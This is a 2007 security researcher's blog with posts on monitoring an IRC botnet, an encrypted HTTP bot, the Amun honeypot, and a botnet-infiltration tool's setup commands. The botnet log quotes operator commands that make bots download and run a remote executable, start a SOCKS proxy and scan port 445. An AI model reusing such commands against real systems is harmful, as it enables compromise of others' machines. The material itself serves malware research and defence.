Virus Blog

Botnet on the move

— Posted by zeroq @ 17:25 - 20 Dec, 2007

today i was able to monitor a botnet switching the server, pretty interesting thing. monitoring was accomplished with the new infiltrator software, which is not released yet =)

enjoy the last commands on the old server and channel:

:MasterMir@221.x JOIN :#r0d#
:MasterMir@221.x PRIVMSG #r0d# :.l m4st3r.p3rd3s1
:P-526356@153.x PRIVMSG #r0d# :-4main- Password accepted.
:MasterMir@221.x PRIVMSG #r0d# :.socks4
:P-526356@153.x PRIVMSG #r0d# :-4socks4- Server started on: 81.x.x.x:2020.
:MasterMir@221.x PRIVMSG #r0d# :.upkcr http://x.x.x.x/farooqss/bilals.exe 1
:P-526356@153.x PRIVMSG #r0d# :-4update- Downloading update from: http://x.x.x.x/farooqss/bilals.exe.
:P-526356@153.x PRIVMSG #r0d# :-4download- downloaded 161.0KB to C:DOCUME~1AdinaLOCALS~1Tempurvzuvd.exe @ 32.2KB/sec, updating bot
:MasterMir@221.x PRIVMSG #r0d# :.rmzcv
:P-526356@153.x PRIVMSG #r0d# :-4main- Removing Bot.
:P-526356@153.x QUIT :EOF From client

if you download the last binary and run it in a sandbox you get the new server IP, and IRC information:
  • C&C Server: 217.x.x.x:6667
  • Server Password:
  • Username: rfmv
  • Nickname: DHEDHI-8788
  • Channel: #a#s#b (Password: picture)
  • Channeltopic: :zasc lsass_445 100 5 0 189.0.x.x -r -b
so lets take a look at the channel:
:DHEDHI-8788@x.x.x.x JOIN :#a#s#b
:DHEDHI-8788 #a#s#b :zasc lsass_445 100 5 0 189.0.x.x -r -b
:DHEDHI-8788 #a#s#b MasterMir 1198165457
:DHEDHI-8788 @ #a#s#b :DHEDHI-8788 SS-71041 DHEDHI-8992 DHEDHI-0502 DHEDHI-9557 DHEDHI-2349 @MasterMir DHEDHI-1473 DHEDHI-5034
: DHEDHI-8788 #a#s#b :End of /NAMES list.
:DHEDHI-4301@x.x.x.x JOIN :#a#s#b
:DHEDHI-4301@x.x.x.x PRIVMSG #a#s#b :scan �� Random Port Scan started on 189.0.x.x:445 with a delay of 5 seconds for 0 minutes using 100 threads.


Encrypted HTTP Bot

— Posted by zeroq @ 10:29 - 20 Dec, 2007

i stumbled over a HTTP based bot, which uses encryption for commands and URL parameters. i have not seen this before so i decided to let you all know about it.

another interesting thing is, the binary does not run with the anubis sandbox, but with cwsandbox.

infected machines issue a HTTP request similar to this: http://64.34.xxx.xxx/tba/p?guid=xxx&version=xxx[...]

the following parameters are used:

  • guid
  • version
  • clientid
  • time
  • locale
  • idle
  • activeWindows
  • crc

the values look like this:

  • E723E7BF51[...]DA96
  • F01[...]B1
  • AB0E[...]0F7

 (More)


Amun first relase v0.1.0

— Posted by zeroq @ 11:39 - 11 Dec, 2007

I decided to release a first version of Amun to the public. Amun is released under the GNU Public Licence. The software is available here: http://zero.ram.rwth-aachen.de/amun/

Amun is a low-interaction honeypot designed to capture autonomous spreading malware, like for example nepenthes. The main difference is, that it is written in python and most parameters can be changed while running, thus it might be easier to add new features.



Amun: replace locals

— Posted by zeroq @ 15:00 - 09 Dec, 2007

the replace local IP function is now fully implemented in Amun. I had some minor issues which needed to be fixed, but its working now. Currently we are running two Amun sensors with about 7000 IP addresses each. One of the sensors is running with replace local IPs turned on, the other one turned off.

Now the interesting thing is, currently, the sensor which does not replace local IPs and therefore has less downloads, has however, much more unique downloads. It seems like replacing local IPs to have more downloads does not actually mean you get all the new ones.

Some Numbers:
Amun (replace locals on): average (overall) downloads per day: 70
Amun (replace locals off): average (overall) downloads per day: 10
Both Sensors running at this settings for 5 days now and sensor number two (with replace locals turned off) currently has 16 unique samples more, that´s about 3 unique samples more per day.



Infiltrator Fast Introduction

— Posted by zeroq @ 10:43 - 04 Dec, 2007

For those of you playing around with the infiltrator script. Here is some short documentation about how to get started:

  • use the "set server" command to set the IP address of the command and control server (e.g. "123.456.789.0")
  • use the "set port" command to set the IRC Server port (e.g. "80")
  • use the "set nickname" command to set the bot nickname (e.g. "DEU|123456789")
  • use the "set usermode" command to set the user mode (e.g. "a a a a:DEU|123456789"). If you do not set the usermode, infiltrator will automatically set it to "worm worm worm worm:[Nickname]".
  • use the "set channel" command to set the botnet channel + channel password (e.g. "#botnet password")
  • in some cases you need a server password as well, and that's were the command "set password" comes into play.

Now you are done setting up the configuration. Next to do is "start thread" and infiltrator will join and monitor the botnet. To save the current configuration use the command "save configuration".

 (More)

Powered by kulando